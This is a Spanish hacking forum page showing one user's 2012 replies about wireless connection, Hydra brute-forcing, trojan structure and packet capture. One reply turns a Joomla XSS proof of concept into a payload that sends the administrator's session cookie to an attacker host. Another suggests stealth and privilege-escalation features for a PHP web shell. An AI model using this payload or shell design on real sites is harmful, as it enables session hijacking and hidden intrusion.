elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13]
121  Seguridad Informática / Análisis y Diseño de Malware / Re: Codigo fuente de un troyano en python en: 4 Noviembre 2012, 23:26 pm
Pedia un codigo fuente de un troyano en python

http://lmgtfy.com/?q=troyano+en+python#

llegaras muy lejos asi ;)
122  Sistemas Operativos / GNU/Linux / Re: backtrack 5 r1 bad password failed en: 4 Noviembre 2012, 19:57 pm
te recomiendo que no utilizes esos gestores, yo siempre los desactivo.

usando iwconfig.

1) tipea iwconfig en una consola y reviza que detecte la tarjeta, si tienes mas de 1 elige con cual te conectas.
2) hazte root.

*esto lo hago con el fin que no este el demonio de wicd intentando conectarse a otra red mientras yo lo hago por consola, aunque igual si existe un demonio intentando conectarse hay que matarlo
3) descativamos la interfaz =>  ifconfig wlan0 down
4) activamos la interfaz       => ifconfig wlan0 up

5)buscamos la red a la que intentaremos conectarnos => iwlist scanning | grep -i essid
6)nos conectamos  =>iwconfig wlan0 essid NombreRed key s:miclave
7)verificamos que estemos asociados a la red con un iwconfig
8)solicitamos los datos de conexion al servidor dhcp => dhclient wlan0


eso es todo para conectarse a wep, al principio te parecera todo un rollo pero despues te acostumbras y veras que es mejor que utilizar gestores.

y si quieres conectarte a wpa ya es otro tema y es mas facil utilizando wpa_passphrase y wpa_supplicant .

espero te sirva, saludos!!
123  Seguridad Informática / Bugs y Exploits / Re: Metasploit + Uso en: 4 Noviembre 2012, 19:17 pm
ns2.elhacker.net/TallerMetasploit2012.pdf

justo lo que necesitabas, en la portada del foro
124  Seguridad Informática / Hacking / Re: hydra http-post-form en: 4 Noviembre 2012, 19:02 pm
no es magia amigo, tienes que poner el texto que corresponde a cuando la contraseña es invalida o cuando la contraseña es valida, al fin y al cabo esto funciona como VERDADER o FALSO.
si no hay cambios en la web cuando introduces un password erroneo, reviza el status devuelto por el servidor.

saludos.
125  Seguridad Informática / Análisis y Diseño de Malware / Re: Codigo fuente de un troyano en python en: 4 Noviembre 2012, 18:55 pm
si es por estudiar la estructura, la estructura es la misma para todos, cliente como servidor y servidor como cliente(conexion inversa), se envia un string que determina el payload a ejecutar, se ejecuta y envia el resultado.

ahora, cual es la idea de realizar un troyano en python ??.    :-\
126  Seguridad Informática / Hacking / Re: wireshark "bytes in flight" en: 25 Octubre 2012, 19:57 pm
quizas no resuelve tu duda pero te recomiendo para tareas pequeñas, como analizar el trafico de una apliacion ngrep , pequeño analizador pero muy util y es mi preferido.

para una captura local :
ngrep -d lo -W byline host 127.0.0.1 and port 80

ahora si lo que estas haciendo es capturando el trafico que genera tu navegador web, te recomiendo HTTP LIVE HEADERS para capturar las peticiones.


saludos.
127  Seguridad Informática / Bugs y Exploits / Re: Cómo utilizar un exploit para Joomla en: 16 Octubre 2012, 19:03 pm
el que dices que deberias usar, es un xss que se envia a travez del metodo post ya que es un formulario, ahi te indica que es un poc y cuando el administrador lo ejecute le saldra una ventana con un mensaje, ahora ese mensaje si lo quieres utilizar lo debes cambiar para realizar el robo de la cookie de la sesion del administrador.

esta parte debes cambiar :
alert(document.cookie)

por algo como
window.location='http://tuhostquealmacenaralacookie.com.ar/robo_cookie.php'+document.cookie

con esto el administrador estaria enviando la cookie a tu host y esta seria captada por el PHP, ahora te digo que este seria el ataque mas basico y el mas cantoso asi que a ingeniarselas.

tambien debes cambiar la ruta de la web del administrador "http://joomla/administrator/index.php".
128  Seguridad Informática / Nivel Web / Re: [PHP Shell] Poison Shell 1.0 (Version Identada) en: 15 Octubre 2012, 07:52 am
podrias agregar funciones que no tienen otras shell, como por ejemplo:

1)conexion a servidor LDAP ??(entre mas versiones mejor, no olvideis active directory y menos openldap please  :rolleyes: ), sirve bastante, creemelo y estaria agradecido ya que ninguna shell lo tiene, por lo menos las que he visto.
2)expresion regular que automatize la busqueda de ejecutables con el SUID activo, facilitaria la busqueda para intentar una escalada de privilegios.
3)listado de procesos y versiones de procesos corriendo como root, y un enlace a su respectivo exploit.

ahi te dejo algunas opciones que podeis agregar, yo he pensado en programar mi shell pero por tiempo no he podido, quizas en un futuro no muy lejano lo pueda hacer :B .

saludines !!

PD: tambien seria interesante para ocultar la shell de algunos mirones, que esta solo respodiera a X user-agent, osea que para poder acceder a esta tenga que modificar el user-agent poniendo un hash como clave, si coincide se muestra la shell de lo contrario mostraria un error 404 .

Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines